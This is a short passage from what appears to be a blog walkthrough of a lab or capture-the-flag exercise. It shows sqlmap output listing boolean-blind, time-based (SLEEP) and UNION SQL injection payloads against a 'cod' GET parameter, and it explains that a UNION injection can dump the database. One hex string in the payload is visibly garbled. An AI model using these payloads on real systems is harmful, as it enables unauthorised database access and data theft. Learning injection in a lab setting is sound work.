![]() ![]() ![]() ![]() Nice, we are on the right path, let’s try dumping the database with the flag -dumpafter the command which we used previously. The output is telling us we can exploit some types of injections: Parameter: cod (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cod=8040 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cod=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: cod=-2183 UNION ALL SELECT CONCAT(0x7171707671,0圆c4145667857526d76456c6575436376564e5542714c524c53736971626c425079675a626a454364,0x7176707a71),NULL,NULL,NULL,NULL,NULL,NULL- Prnv What we have in our hands is a SQL Injection that can bring us a lot of information easily since it is not blind, using UNION SQL Injections you can get every information you need from the database. You can try it manually if you wish to learn or even remember how SQL injections work which was what I did, but here I will show how to use SQLMap to do it automatically for us. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |